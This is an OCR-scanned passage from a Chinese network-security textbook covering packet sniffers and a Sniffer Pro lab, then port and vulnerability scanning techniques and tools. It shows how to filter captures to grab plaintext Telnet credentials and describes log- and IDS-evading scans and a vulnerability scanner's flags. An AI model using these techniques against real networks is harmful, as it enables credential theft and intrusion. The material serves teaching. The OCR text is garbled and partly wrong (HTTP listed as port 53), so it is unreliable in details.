混杂 模式 后 ,就 可 以 接收 网 络 上 的 所 有 报 文 和 数据 帧 了 。 这 人 台 计算 机 上 安装 的 用 于 处 理 捕 
获 报 文 的 软件 就 是 一 个 嗅觉 器 。 


查看 数据 包 MA 地 址 


本 地 接口 地 


或 广播 地 址 其 他 硬件 地 址 


混杂 模式 非 混杂 模式 


产生 中 断 , 通知 CPU 不 处 理 ， 丢 弃 


图 4.13 网 卡 对 报 文 的 处 理 过 程 


可 见 ,Sniffer 工作 在 网 络 环境 中 的 底层 , 它 会 “ 嗅 ” 到 所 有 在 网 络 上 传输 的 数据 。 由 于 
在 一 个 以 太 网 中 ,账号 和 口令 都 是 以 明文 形式 传输 的 ,因此 一 旦 入 侵 者 获取 了 其 中 一 台 主 机 
的 管理 员 权限 ,并 将 其 配置 成 混杂 模式 (接收 经 过 的 一 切 信息 ), 就 有 可 能 对 网 络 中 的 其 他 所 
有 计算 机 发 起 攻击 。 

(2) 交换 式 网 络 上 的 Sniffer 

交换 式 网 络 不 是 共享 网 络 ,交换 式 设备 可 以 准确 地 将 数据 报 文 发 给 目的 主机 。 这 时 ,Snif- 
fer 攻击 的 一 个 简单 的 方法 就 是 将 安装 有 Sniffer 软件 的 计算 机 伪装 成 网 关 。 由 于 一 个 局 域 网 
上 发 往 其 他 网 络 的 数据 帧 的 目标 地 址 都 是 指向 网 关 的 ,Sniffer 就 能 嗅 到 本 地 网 中 的 数据 。 

Sniffer 只 是 接受 数据 ,而 不 向 外 发 送 数据 ,从 而 能 悄 无 声息 地 监听 到 所 有 局 域 网 内 的 
数据 通信 ,其 潜在 危害 性 也 在 于 此 。 
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2. Sniffer 产品 


(1) Sniffer Pro 

Sniffer Pro 是 NAI 公 司 开发 的 一 种 图 形 界面 嗅觉 器 。 它 的 功能 强大 ,能 全 面 监视 所 有 
网 络 的 信息 流量 ,识别 和 解决 网 络 问题 ,是 目前 唯一 能 够 为 七 层 OSI 网 络 模型 提供 全 面 性 
能 管理 的 工具 。 

(2) Libpcap/ Winpcap 

Libpcap 是 Packet Capture Library( 数 据 包 捕获 函数 库 ) 的 缩写 与 重组 。 它 不 是 一 个 
Sniffer, 但 是 它 提供 的 C 语言 函数 接口 可 用 于 对 经 过 网 络 接口 数据 包 的 捕获 ,以 支持 Snif- 
fer 产品 的 开发 。Winpcap 是 Libpcap 的 Win32 版 本 。 

(3) Dsniff 

Dsniff 是 Dug Song 编写 的 一 个 功能 强大 的 工具 软件 包 , 它 可 以 支持 多 种 协议 类 型 , 包 
括 FTP、Telnet, rlogin、 Ldap、SMTP,、 Pop、 Imap\ IRC,\ ICQ, MS-CHAP, Npster, Citrix、 
ICA .PCAnywher, SNMP.、 OSPF. PPTP、 X11.\ NFS., RIP、 VRRP. Oracle SQL * Net 、Mi- 
crosoft SQL protocol、Postgre SQL 等 。 

(4) Tcpdump/ Windump 

Tcpdump 是 一 个 传统 的 嗅觉 器 ,通过 将 网 卡 设置 为 混杂 模式 截取 帧 进行 工作 。 


实验 13 Sniffer 工具 的 使 用 


1. 实验 目的 


(1) 了 解 Sniffer 的 基本 原理 。 
(2) 掌握 一 种 Sniffer 工具 的 基本 用 法 。 


2. 实验 内 容 


(1) 下 载 并 安装 一 种 Sniffer 工具 。 
(2) 使 用 安装 的 Sniffer 工具 进行 网 络 信息 收集 。 


3. 示范 软件 一 一 Sniffer Pro 


Sniffer Pro 是 一 个 具有 代表 性 的 Sniffer 工具 软件 ,由 Network Associates 公司 发 布 。 
它 具 有 如 下 一 些 功 能 : 
为 网 络 协议 分 析 捕 获 网 络 数据 包 ; 
可 识别 250 种 以 上 的 网 络 协议 ,可 以 基于 协议 .MAC/IP 地 址 .匹配 模式 等 设置 
过 滤 ; 
实时 监控 网 络 活动 ,用 专家 系统 帮助 分 析 网 络 及 应 用 故障 ; 
进行 网 络 使 用 统计 、 错 误 统计 .协议 统计 .工作站 和 服务 器 统计 ; 
可 设置 多 种 触发 模式 ,如 基于 错误 报 文 、 外 部 事件 ; 
具有 可 选 的 流量 发 生 器 ,模拟 网 络 运行 ,衡量 啊 应 时 间 .路 由 跳 数 计数 ,进行 排 错 。 
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下 面 介 绍 Sniffer Pro 的 基本 用 法 。 

(1) 选 定 要 监视 的 网 卡 

在 进行 数据 捕获 之 前 ,必须 先 确定 捕获 的 位 置 。 如 果 一 台 计 算 机 上 安装 了 多 个 网 卡 ,就 
要 先 确定 从 哪个 网 卡 上 接收 数据 。 

设置 位 置 : File-> Select Settings( 如 图 4. 14 Select Settings | 


Select settings for monitoring: 


所 示 )。 在 默认 情况 下 ,在 一 个 名 为 Local 的 本 地 
代理 目录 下 列 出 了 所 有 网 卡 的 列表 。 图 4. 14 表 
明 只 有 一 个 网 卡 。 

除了 使 用 默认 的 Local 本 地 代理 配置 外 ， 


Current nedim Ethernet 802.3 
Line _ 


还 可 以 使 用 New 按钮 新 建 一 个 本 地 代理 设置 ， 10 ps 
或 用 Edit 以 及 Delete 进行 本 地 代理 配置 的 Ce ] we | 
编辑 。 图 4. 14 Settings 窗口 选择 网 络 适配器 


(2) 快捷 键 的 使 用 
如 图 4.15 所 示 , 在 Sniffer Pro 的 主 界 面 上 部 有 两 排 快捷 键 ,分 别 可 以 在 捕获 报 文 时 或 
在 网 络 性 能 监视 时 使 用 。 


Sniffer Portable — Local, FEthernet (Line speed at 100 WM i 
2 2 捕获 报 文 快捷 键 
File Monitor Capture Display Tools Database Window Help 


网 络 性 能 监视 快捷 刍 


图 4.15 快捷 键 


(3) 定义 过 滤器 设置 捕获 条 件 
设置 位 置 : Define Filter( 从 Monitor、Capture 或 Display 中 都 可 以 单 击 Define Filter 进入 ) 。 
@ 地 址 条 件 设置 
设置 位 置 : Define Filter 的 Address 选项 卡 。 如 在 图 4. 16 中 选 定 地 址 类 型 为 IP ,在 
Stationl 和 Station2 中 分 别 指定 要 捕获 的 地 址 对 为 192. 168. 113. 208 和 192. 168. 113. 50。 
Define Filter | 
Saaay Miress |Dats Patters | htraceal Potter | For 


New1 
INew2 


四 网 Browdeast/hlticast Miress 
@ hdress Book 


图 4.16 在 Define Filter 的 Summary Address 中 设置 地 址 条 件 
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选项 卡 可 以 指定 多 达 10 个 地 址 对 。 

地 址 有 两 种 : 

。 链 路 层 (硬件 ) 捕获 按 源 /目的 MAC 地 址 捕获 。 用 十 六 进 制 连续 输入 ， 

如 : 00EOFC123456 。 

。 IP 层 捕获 : 按 源 /目的 IP 进行 捕获 。 输 入 方式 为 点 间隔 方式 ,如 : 10. 107.1.1。 

如 果 选 择 IP 层 捕获 条 件 , 则 ARP 等 报 文 将 被 过 滤 掉 。 

@ 协议 条 件 设 置 

设置 位 置 : Define Filter 的 Advanced 选项 卡 。 

在 协议 选择 树 中 可 以 选择 需要 捕获 的 协议 条 件 , 如 果 什么 都 不 选 , 则 表示 忽略 该 条 件 ， 
捕获 所 有 协议 。 图 4. 17 为 指定 要 捕获 的 协议 为 I P/TCP/TELNET,Packet Size 设置 为 
Equal 55,Packet Type 设置 为 Normal。 


选择 要 捕获 的 协议 


捕获 帧 长 度 条 件 


并 误 帧 是 否 捕获 


本 1 口 口 眉 口 同 口 口 


~ 
村 
要 
六 
双 
要 
所 


保存 过 小 规则 条 件 


图 4.17 指定 要 捕获 的 协议 


@ 任意 捕获 条 件 

设置 位 置 : Define Filter 的 Data Pattern 选项 卡 。 

在 这 里 ,可 以 编辑 任意 捕获 条 件 。 有 多 个 条 件 时 ,可 以 使 用 AND、OR 和 NOT 的 连接 
关系 ,如 图 4.18 所 示 。 

@ Define Filter 其 他 选项 卡 

。 Add Patten: 编辑 具体 的 数据 模式 。 

。 Summary: 查看 过 滤器 的 设置 ,默认 缓冲 区 大 小 为 8MB。 

。 Buffer: 指定 捕获 缓冲 区 大 小 以 及 缓冲 区 满 的 条 件 。 

(4) 捕获 报 文 


@ 捕获 面板 
报 文 捕获 功能 可 以 在 图 4. 19 所 示 的 报 文 捕获 面板 中 进行 完成 。 用 户 可 以 在 文本 列表 


框 中 选择 过 滤器 。 图 中 选择 的 是 默认 的 过 滤器 。 选 择 了 过 滤器 后 ,在 这 个 报 文 捕获 面板 中 ， 
单 击 Capture 习 Start(F10) 就 开始 进行 捕获 。 
注意 ,在 捕获 报 文 快捷 键 中 有 一 个 望远镜 图 标 。 当 望远镜 图 标 变 红 时 ,表示 已 捕捉 到 数 
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Define Filter — Capture 


Sanmary | Address Data Pattern | Advanced | Buffer | 


Add AD/OR | Toggle AHD/OR| Tozae HoT | Add NWOT 
Add Pattern| Edit Partern Delete Evaluate 


取消 “| Profiles... 
图 4.18 任意 捕获 条 件 编辑 


望远镜 图 标 


图 4.19 捕获 面板 


据 。 这 时 , 单 击 该 图 标 捕获 停止 即 可 观看 有 关 信 息 。 

@ 捕获 过 程 报 文 统计 

在 捕获 过 程 中 可 以 通过 查看 捕获 报 文 的 数量 和 缓冲 区 的 利用 率 。 

位 置 : Capture 习 Capture Panel。 

在 Detail 选项 卡 ( 如 图 4. 20) 中 ,显示 导出 到 文件 的 进度 等 详细 统计 信息 。 

在 Gauge 选项 卡 中 显示 利用 率 、 捕 获 速度 ( 包 / 秒 ) 和 实时 错误 率 。 

(5) 专家 分 析 

专家 分 析 系 统 提 供 了 一 个 分 析 平 台 , 对 网 络 上 的 流量 进行 了 一 些 分 析 , 可 以 方便 地 了 解 
网 络 中 高 层 协议 出 现 故障 的 可 能 点 ,对 于 分 析出 的 诊断 结果 可 以 查看 在 线 帮助 获得 。 

对 于 某 项 统计 分 析 可 以 通过 用 鼠标 双击 此 条 记录 可 以 查看 详细 统计 信息 且 对 于 每 一 项 
都 可 以 通过 查看 帮助 来 了 解 产 生 的 原因 。 

设置 位 置 : Capture 习 Display ,在 底面 板 选 择 Expert。 
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捕获 数据 包 数 量 


Capture 


ioo 水 


"1 | 0 Do 


| Gauge Detail 


捕获 数据 报 文 的 缓冲 区 大 小 
图 4. 20 ”Capture Panel 的 Detail 选项 卡 


在 Expert 窗口 中 有 3 个 选项 卡 : 
。 单 击 Diagnoses 选项 卡 , 可 以 在 右 侧 的 详细 面板 中 查看 专家 分 析 器 对 网 络 中 异常 现 


象 的 诊断 情况 (如 图 4. 21 所 示 )。 


蝇 昌 | 全 | a| 尖 | 划 人 | 要 和 el 区 | 加 | 多 | 可 | 
EE | 


Tm 
EP: [Te 18.3.155] ~ [one 1 
TCP [17e.16.3. 125] ~ [202 1 
I ] 

1 


ED 


ae SE 
N 加 | 生 mn BT 


Yor Melp, press 下 


图 4. 21 Expert 的 Diagnoses 选项 卡 


。 单 击 Symptoms 选项 卡 , 可 在 右面 的 详细 面板 中 查看 网 络 中 的 异常 征兆 。 
。 单 击 Objects 选项 卡 , 列 出 分 析 对 象 类 型 ,如 对 应 物理 层 和 数据 链 路 层 的 工作 站 


DLC、 对 应 网 络 层 的 网 络 工作 站 ,以 及 连接 、 会 话 、 应 用 、 服 务 、 子 网 .路 由 器 等 有 用 
实体 。 


(6) 解码 分 析 
设置 位 置 : Capture 习 Display, 在 底面 板 选 择 Decode。 


图 4. 22 是 对 捕获 报 文 进行 解码 的 显示 。 解 码 显 示 通 常 分 为 3 部 分 : 
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捕获 的 报 文 


Xi 7BFE84 
UNIT-YB2P9582DH 
W27247 

[10 11.128.157] 


CI 司 
总 报 文 解 但 


Hardware type = 1 (10Mb Ethernet) 
| MARP: Protocol type = 0800 (IP) 
OY ARP: Length of hardware address = 6 bytss 


Tangth nf pratocol addrosp, = 4 hghem a 一 进 制 内 容 


00000000 : 
00000010 
[00000020 : 


0 ] 00 00 00 00 00 00 
00 00 00 00 00 00 O00 00 3c dc 41 1 


图 4.22 在 Decode 窗口 进行 解码 分 析 


目前 大 部 分 此 类 软件 结构 都 采用 这 种 结构 显示 。 
下 面 是 一 个 解码 的 实际 例子 。 例 中 ,Telnet 到 一 台 开 有 Telnet 服务 的 Linux 机 器 上 ， 
使 用 了 如 下 命令 : 


telnet 192. 168. 113. 50 
login: test 


Password: xxxxxx 


当 望 远 镜 图 标 变 红 时 , 单 击 之 ,出 现 图 4. 23。 选 择 箭头 所 指 的 Decode 选项 即 可 看 到 捕 
提 到 的 所 有 包 。 可 以 清楚 地 看 出 用 户 名 为 test ,密码 为 123456。 


-113.20 
192.168.113.208 
192.168.113.208 
192.168.113.208 
192.169.113,208 
32.168 .113,208 


[IN 
门 
门 
| 
| 
| 
品 
| 
门 
中 
中 
| 
门 
品 
| 
| 
品 
吕 
ll 
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Ethertype*0000. size"60 bytes 
IP: De[192.168,113,50] S*[192.168,113,208] LEN*21 ID*24583 
Ss D=23 S-2060 ACK=859603127 SEO*3488832343 LEN=1 VIN=17412 


4.23 一 个 解码 分 析 的 实例 


这 里 ,对 包 大 小 (Packet Size) 设 为 55, 是 因为 客户 端 Telnet 到 服务 器 端 时 一 次 只 传送 

一 个 字 节 的 数据 ,由 于 协议 的 头 长 度 是 一 定 的 ,Telnet 数据 包 大 小 为 DLC(14 字 节 ) 十 IP(20 

字 节 ) 十 TCP(20 字 节 ) 十 数据 (1 字 节 ) 王 55 字 节 ,这样 将 Packet Size 设 为 55 正好 能 抓 到 用 
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户 名 和 密码 ,否则 将 抓 到 许多 不 相关 的 包 。 

要 能 够 利用 软件 解码 分 析 解 决 问题 ,关键 是 要 对 各 种 层次 的 协议 了 解 得 比较 透彻 ,这 样 
才能 看 懂 解 析出 来 的 报 文 。 

Sniffer Pro 的 功能 较 多 。 上 面 只 作 简 要 介绍 。 其 他 内 容 可 以 参考 相应 文献 。 


4. 实验 准备 


(1) 设计 实验 的 环境 。 
(2) 选 定 一 种 Sniffer 工具 ,记录 其 下 载 网 址 。 
(3) 罗列 出 使 用 该 Sniffer 工具 的 步骤 和 方法 。 


5. 推荐 的 分 析 讨论 内 容 


(1) 分 析 Sniffer 工具 在 网 络 管理 和 网 络 安全 方面 的 作用 。 
(2) 其 他 发 现 或 想到 的 问题 。 


4.6.3 扫描 器 


扫描 是 收集 系统 信息 (远程 操作 系统 的 识别 .网 络 结构 的 分 析 以 及 其 他 敏感 信息 的 收 
集 ) 和 发 现 漏洞 的 过 程 , 它 不 仅 是 攻击 者 常用 的 作案 手段 ,也 是 管理 人 员 维 护 网 络 安全 的 有 
力 武器 。 

1. 扫描 策略 


扫描 在 实施 策略 上 可 以 采用 被 动 式 和 主动 式 两 种 策略 。 
(1) 被 动 式 扫描 策略 
被 动 式 扫描 策略 主要 检测 系统 中 不 合适 的 设置 .脆弱 的 口令 以 及 同安 全 规则 相抵 触 的 
对 象 , 具 体 还 可 以 分 为 如 下 几 类 ; 
。 基于 主机 的 扫描 技术 ,主要 涉及 系统 的 内 核 , 文 件 的 属性 .操作 系统 的 补丁 等 ,能 把 
一 些 简 单 的 口令 解密 和 剔除 ,能 非常 准确 地 定位 系统 存在 的 问题 ,并 发 现 漏洞 。 
。 基 于 目标 的 扫描 技术 ,其 基本 原理 是 基于 消息 加 密 算法 和 Hash 函数 ,因此 只 要 输 
和 人 有 一 点 变化 ,输出 就 会 发 生 很 大 变化 ,可 以 感知 文件 和 数据 流 的 细微 变化 ,通常 用 
于 检测 系统 属性 和 文件 属性 ,如 数据 库 、 注 册 号 等 。 
。 基于 应 用 的 扫描 技术 ,这 种 技术 主要 用 于 检查 应 用 软件 包 的 设置 和 安全 漏洞 。 
(2) 主动 式 扫描 策略 
主动 式 扫 描 策 略 是 基于 网 络 的 扫描 技术 ,主要 通过 一 些 脚本 文件 对 系统 进行 攻击 ,记录 
系统 的 反应 ,从 中 发 现 漏洞 。 


2. 扫描 对 象 


在 计算 机 网 络 中 ,扫描 是 通过 向 目标 主机 发 送 数据 报 文 ,从 响应 中 获得 目标 主机 的 有 关 
信息 。 按 照 扫 描 对 象 , 可 以 将 扫描 分 为 如 下 3 种 主要 类 型 。 
(1) 地 址 扫描 
I 


地 址 扫描 就 是 判断 某 个 IP 地 址 上 有 无 活动 主机 或 某 台 主机 是 否 在 线 。 最 简单 的 地 址 
扫描 方法 是 使 用 ping 命令 ,用 ping 命令 向 目标 主机 发 送 ICMP 回 显 请 求 报 文 , 并 等 待 IC- 
MP 回 显 应 答 。 如 果 ping 不 到 某 台 主机 ,就 表明 它 不 在 线 。 

ping 命令 的 发 送 可 以 手工 一 条 一 条 地 进行 ,也 可 以 用 Fping 等 根据 进行 大 范围 的 地 址 
扫描 ,得 到 一 个 网 段 中 的 在 线 地 址 列表 。 

(2) 端口 扫描 

在 TCP/IP 网 络 中 ,端口 号 是 主机 上 提供 的 服务 的 标识 。 例 如 ,FTP 服务 的 端口 号 为 
21、Telnet 服务 的 端口 号 为 23 .DNS 服务 的 端口 号 为 53、Http 服务 的 端口 号 为 53 等 。 入 
侵 者 知道 了 被 攻击 主机 的 地 址 后 ,还 需要 知道 通信 程序 的 端口 号 。 只 要 扫描 到 相应 的 端口 
被 打开 ,就 知道 目标 主机 上 运行 着 什么 服务 ,以 便 采 取 针 对 这 些 服务 的 攻击 手段 。 

(3) 漏洞 扫描 

漏洞 是 系统 所 存在 的 安全 缺陷 或 薄弱 环节 。 人 入侵 者 通过 扫描 可 以 发 现 可 以 利用 的 漏 
洞 ,并 进一步 通过 漏洞 收集 有 用 信息 或 直接 对 系统 实施 威胁 。 管 理 人 员 可 以 通过 扫描 对 所 
管理 的 系统 和 网 络 进行 安全 审计 ,检测 系统 中 的 安全 脆弱 环节 。 常 用 的 扫描 工具 有 
Xscan 等 。 


3. 基本 扫描 技术 


(1) 半 开 放 扫描 

TCP 连接 通过 三 次 握手 (three-way handshake) 建 立 。 图 4. 24 表示 了 一 个 建立 TCP 
连接 的 三 次 握手 过 程 。 若 主机 B 运行 一 个 服务 器 进程 , 则 它 要 首先 发 出 一 个 被 动 打开 命 
令 ,要求 它 的 TCP 准备 接收 客户 进程 的 连接 请 求 , 然 后 服务 器 进程 就 处 于 “ 听 ” 状 态 ,不 断 检 
测 有 无 客户 进程 发 起 连接 的 请 求 。 


主机 A TCPA TCPs 主机 B 
连接 请 求 SYN=1, ACK=0, SEQ=x 
SYN=1, ACK=1, SEQ=y, ACK=x+1 确认 
确认 SYN=1, ACK=1, SEQ=x+1, ACK=y+1 


图 4.24 建立 TCP 连接 的 三 次 握手 过 程 


若 主机 A 中 运行 有 客户 进程 , 当 它 需要 服务 器 的 服务 时 ,就 要 向 它 的 TCP 发 出 主动 连 
接 请 求 : : 用 SYN=1 和 ACK=0 表示 连接 请 求 ,用 SEQ 二 x 表示 选择 了 一 个 序号 。 主 机 B 
收 到 A 的 连接 请 求 报 文 ,就 完成 了 第 一 次 握手 。 

主机 B 如 果 同 意 连接 ,其 TCP 就 向 A 发 回 确认 报 文 : 用 SYN=1 和 ACK= 王 1 表示 同 
意 连接 ,用 ACK 二 x 十 1 表示 对 x 的 确认 ,用 SEQ=y 表 示 也 选择 的 一 个 序号 。 主 机 A 接收 
到 该 确认 报 文 , 完 成 了 第 二 次 握手 。 

接着 ,主机 A 的 TCP 还 要 向 主机 B 发 出 确认 : 用 SYN=1 和 ACK=1 表示 同意 连接 ， 
用 ACK=y 十 1 表示 对 y 的 确认 ,同时 发 送 A 的 第 一 个 数据 x 十 1。 主 机 B 收 到 主机 A 的 确 
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认 报 文 , 完 成 了 第 三 次 握手 过 程 。 

完成 这 样 一 个 三 次 握手 , 才 算 建立 了 可 靠 的 TCP 连接 ,才能 可 靠 地 传输 数据 报 文 。 

攻击 者 进行 端口 扫描 最 常用 的 方法 就 是 尝试 与 远程 主机 的 端口 建立 一 次 正常 的 TCP 
连接 。 连 接 成 功 , 表 示 端 口 开 放 。 这 种 扫描 方式 称 为 “TCP connect 扫描 ”。 但 是 ,这 种 扫 撒 
往往 会 被 远程 系统 记 和 人 日志。 针对 这 一 缺陷 , 便 产生 了 半 开 放 扫 描 一 一 *TCP SYN 扫描 ”。 
因为 当 客户 端 发 出 一 个 SYN 连接 请 求 报 文 后 ,如 果 收 到 了 远程 目标 主机 的 ACK/SYN 确 
认 ,就 说 明和 远程 主机 的 该 端口 是 打开 的 ;而 若 没 有 收 到 远程 目标 主机 的 ACK/SYN 确认 ,而 
是 收 到 RST 数据 报 文 (表明 连接 出 现 了 问题 ) ,就 说 明 远 程 主机 的 该 端口 没有 打开 。 这 样 对 
于 扫描 要 获得 的 信息 已 经 足够 了 ,也 不 会 在 目标 主机 的 日 志 中 留 下 记录 。 

(2) FIN 扫描 

FIN 是 释放 连接 的 数据 报 文 ,表明 发 送 方 已 经 没有 数据 要 发 送 了 。 很 多 日 志 不 记录 这 
类 报 文 。“TCP FIN 扫描 ”的 原理 是 向 目标 端口 发 送 FIN 报 文 ,如 果 收 到 了 RST 的 回复 , 表 
明 该 端口 没有 开放 ;反之 (没有 回复 ) ,该 端口 是 开放 的 ,因为 打开 的 端口 往往 忽略 对 FIN 的 
回复 。 这 种 方法 还 可 以 用 来 区 别 操 作 系 统 是 Windows ,还 是 UNIX。 

但 是 ,有 的 系统 不 管 端口 打开 与 否 ,一 律 回复 RST。 这 时 ,FIN 扫描 就 不 适用 了 。 

(3) 反 向 扫描 

反 向 扫描 是 一 种 地 址 扫描 技术 ,主要 用 于 获得 可 到 达 网 络 和 主机 的 地 址 列表 ,借以 推断 
出 一 个 网 络 的 结构 分 布 图 。 其 基本 原理 是 利用 了 多 数 路 由 器 只 对 报 文中 的 地 址 进行 检查 ， 
而 不 分 析 报 文 的 内 容 。 具 体 方法 是 使 用 可 以 穿 过 防火 墙 的 RST 数据 报 文 对 网 络 地 址 进行 
扫描 。 向 一 个 网 络 中 的 所 有 地 址 发 送 RST 报 文 后 ,路 由 器 会 对 这 些 报 文 进行 检查 : 当 目 标 
地 址 不 可 到 达 时 ,就 送 回 ICMP 差错 报 文 ;没有 返回 的 ICMP 差错 报 文 的 ,就 是 主机 在 线 。 
根据 不 在 线 的 主机 进行 求 逆 可 以 获得 在 线 主机 列表 。 

(4) 慢 速 扫描 

慢 速 扫描 就 是 使 用 非 连续 性 端口 进行 时 间 间 隔 长 且 无 定 率 的 扫描 ,并 使 用 不 一 致 的 源 
地 址 ,使 这 些 扫描 记录 无 规律 地 分 布 在 大 量 的 日 志 中 ,而 被 洽 没 ,给 日 志 分 析 造 成 困难 。 

(5) 乱 序 扫描 

乱 序 扫描 就 是 对 扫描 的 端口 号 集合 随机 地 产生 扫描 顺序 ,并 且 每 次 的 扫描 顺序 不 同 。 
这 就 给 对 入 侵 检测 系统 的 发 觉 带 来 困难 。 


4. 常用 扫描 器 举例 


目前 已 经 开发 出 了 大 量 的 扫描 器 。 下 面 仅 举 几 个 例子 。 
(1) ISS/SAFESuite( 应 用 层 风 险 评 估 工 具 ) 


网 址 : http://www. iss. net/products_ services/enterprise_ protection/vulnerability _ 


assessment/scanner_internet. php 
类 别 : 商业 
台 : Windows 
简介 : ISS(internet security scanner) 始 于 1992 年 ,最 初 由 Christopher Klaus 发 布 ,是 
一 个 小 小 的 开放 源 代码 扫描 器 ,但 功能 强大 ,不 过 价格 也 较 昂 贵 。 它 可 以 用 来 检查 使 用 
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TCP/IP 协议 网 络 连接 的 主机 是 否 会 受到 攻击 ,可 以 扫描 的 漏洞 有 : 

。 一些 默认 的 包头 ,如 是 否 存 在 guest、bbs 等 ; 

。 IP 包头 ; 

。 Decode Alias; 

。 Sendmail; 

。 匿名 FTP; 

。 NIS; 

s NFS; 

。 rusers。 

SAFESuite 是 ISS 的 最 新 版 本 , 它 的 功能 更 强 、 效 率 更 高 ;不 仅 可 以 在 UNIX 下 运行 ， 
还 可 以 在 Windows 下 运行 ;不 仅 能 对 各 种 服务 进行 广泛 的 检查 ,还 能 对 发 现 的 每 个 漏洞 提 
供 如 下 信息 : 

。 位 置 ， 

。 有关 描述 ; 

。 正确 的 应 对 建议 。 

(2) Nessus( 最 好 的 开放 源 代码 风险 评估 工具 ) 

网 址 : http://www. nessus. org/ 

类 别 : 开放 源 代码 

平台 : Linux/BSD/UNIX 

简介 : Nessus 是 一 款 可 以 运行 在 Linux、BSD、Solaris 以 及 其 他 一 些 系统 上 的 远程 安全 
扫描 软件 。 它 是 多 线程 .基于 插入 式 的 软件 ,允许 用 C 语言 或 Nessus 自 带 的 语言 (Nessus 
attack seripting language,NASL) 编 写 攻击 程序 ,还 拥有 很 好 的 GTK 界面 。 目前 可 以 检查 
多 达 320 个 远程 安全 漏洞 ,能 够 完成 超过 1200 项 的 远程 安全 检查 ;具有 强大 的 报告 输出 能 
力 , 可 以 产生 HTML XML .LaTeX 和 ASCII 文本 等 格式 的 安全 报告 ,并且 为 每 一 个 发 现 的 
安全 问题 提出 解决 建议 。 

(3) Nikto( 一 款 非常 全 面 的 Web 扫描 器 ) 

网 址 : http://www. cirt. net/code/nikto. shtml 

类 别 : 开放 源 代码 

平台 : Linux/BSD/UNIX/Windows 

简介 : Nikto 是 一 款 能 对 Web 服务 器 多 种 安全 项 目 进 行 测试 的 扫描 软件 ,能 在 200 多 
种 服务 器 上 扫描 出 2000 多 种 有 潜在 危险 的 文件 .CGI 及 其 他 问题 。 它 也 使 用 LibWhiske 
库 , 但 通常 比 Whisker 更 新 得 更 为 频繁 。 

(4) Nmap( 扫 描 之 王 ) 

网 址 : http: //www. insecure. org/nmap 

平台 : Linux/UNIX 

简介 : Nmap 扫描 器 是 运行 在 Linux/UNIX 下 的 一 个 功能 非常 强大 的 工具 , 称 为 扫描 
之 王 , 有 可 能 成 为 新 一 代 网 络 主机 信息 扫描 器 的 标准 。 它 支持 多 种 协议 的 扫描 ,如 TCP、 
UDP ICMP 等 ,可 以 用 来 查看 有 哪些 主机 以 及 其 上 运行 何 种 服务 。 已 经 实现 的 扫描 方式 包 
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括 : Vanilla TCP connect 扫描 、TCP SYN (half open) 扫描 、TCP FIN、Xmas 或 NULL 
(stealth) 扫描 、TCP ftp proxy (bounce attack) 扫描 、 使 用 IP 分 片 包 的 SYN/FIN 扫描 、 
TCP ACK 和 Window 扫描 、UDP raw ICMP port unreachable 扫描 、ICMP ping 扫描 、TCP 
ping 扫描 、Direct (non portmapper) RPC 扫描 ,通过 TCP/IP 堆栈 探测 远程 主机 操作 系统 
和 Reverse-ident 扫描 等 。 Nmap 还 实现 了 诸如 动态 调整 延 时 、 超 时 、 重 传 和 端口 并 行 扫 描 等 
智能 化 的 功能 。 它 还 提供 一 些 实用 功能 ,如 通过 TCP/IP 来 甄别 TCP/IP 操作 系统 类 型 . 隐 
项 扫描 欺骗 扫描 、 分 布 扫描 、 平 行 扫描 .直接 RPC 扫描 ,以 及 灵活 的 目标 选择 和 端口 描 
述 等 。 

(5) Saint( 安 全 管理 员 的 综合 网 络 工具 ) 

网 址 : http: //www. saintcorporation. com/saint/ 

类 别 : 商业 

平台 : Linux/BSD/UNIX 

简介 : Saint 是 一 款 商业 化 的 风险 评估 工具 ,但 与 那些 仅 支 持 Windows 平台 的 工具 不 
同 ,Saint 运行 在 UNIX 类 平台 上 ,过 去 它 是 免费 的 并 且 是 开放 源 代 码 的 ,但 现在 是 一 个 商 
业 化 的 产品 。 

(6) SARA( 安 全 管理 员 的 辅助 工具 ) 

网 址 : http: //www-arc. com/sara/ 

类 别 : 开放 源 代码 

平台 : Linux/BSD/UNIX 

简介 : SARA(security auditor’”’s reseach assistant) 是 一 款 基 于 SATAN 安全 扫描 工具 
开发 而 来 的 风险 评估 工具 ,具有 很 好 的 图 形 用 户 界面 ,通过 查看 各 种 网 络 服务 (Finger、 
FTP、NFS、TFTP 等 ) 收 集 主 机 或 主机 所 在 网 络 的 信息 。 它 每 月 更 新 两 次 。 

(7) SuperScan(Windows 平台 上 的 TCP 端口 扫描 器 ) 

网 址 : http://www. foundstone. com/index. htm? subnav=resources/ 

navigation. htm&.subcontent= /resources/proddesc/ superscan. htm 

类 别 : 免费 

平台 : Windows 

简介 : SuperScan 是 一 款 具 有 TCP connect 端口 扫描 、ping 和 域名 解析 等 功能 的 工具 ， 
能 较 容 易 地 做 到 对 指定 范围 内 的 IP 地 址 进行 ping 和 端口 扫描 。 

(8) mysfind( 漏 洞 扫描 ) 

简介 : mysfind 扫描 器 是 很 著名 的 扫描 器 pfind 的 加 强 版 ,主要 用 于 扫描 Printer 漏洞 
和 Unicode 漏洞 。Printer 漏洞 可 以 让 攻击 者 取得 系统 的 控制 权 , Unicode 可 以 让 攻击 者 随 
意 操作 系统 内 的 文件 甚至 完全 控制 系统 。mysfind 是 一 个 命令 行程 序 , 它 采用 多 线程 扫描 
系统 漏洞 ,速度 快 、 结 果 准 。 

使 用 格式 : sfind 二 漏洞 类 型 二 二 开始 IP 地 址 二 结束 IP 地 址 二 

扫描 方式 : 有 3 种 。 

。 -all 扫描 所 有 漏洞 ; 

。-e 扫描 Printer 漏洞 .可 以 让 攻击 者 取得 系统 的 控制 权 ; 
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。-u 扫描 Unicode 漏洞 ,可 以 让 攻击 者 随意 操作 机 器 内 的 文件 甚至 完全 控制 系统 。 

扫描 结束 以 后 ,结果 自动 保存 在 sfind. txt 文件 中 。 

(9) X-Scan( 漏 洞 扫 描 ) 

X-Scan 是 扫描 大 范围 网 段 中 存在 漏洞 主机 的 扫描 工具 。 它 采用 多 线程 方式 对 指定 IP 
地 址 (或 单机 ?进行 安全 漏洞 检测 ,支持 插件 功能 ,可 以 在 图 形 和 命令 两 种 界面 下 操作 。 扫 描 
内 容 包 括 : 远程 操作 系统 类 型 及 版 本 、 标 准 端口 状态 、 端 口 BANNER 信息 .SNMP 信息 、 
CGI 漏洞 IIS 漏洞 .RPC 漏洞 .SQL-Server、FTP-Server、SMTP-Server、POP3-Server、NT- 
Server .注册 表 信 息 等 。 

(10) 流光 


流光 是 国内 编程 高 手 小 榕 的 得 力 之 作 。 它 具有 高 
效 的 用 户 流 模式 、 高 效 服 务 器 流 模式 ,可 同时 对 多 台 
